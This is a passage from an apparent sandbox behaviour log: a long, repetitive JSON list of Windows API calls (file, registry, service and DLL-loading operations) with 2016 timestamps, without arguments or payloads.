17:41:36,054", "api": "OpenServiceW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegQueryInfoKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtReadFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,054", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,054", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,054", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,054", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,054", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,054", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtDeviceIoControlFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": 
"NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,064", "api": "LdrLoadDll"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenSCManagerW"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,064", "api": "OpenServiceW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,064", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,074", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,084", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,094", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,104", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,104", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,114", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
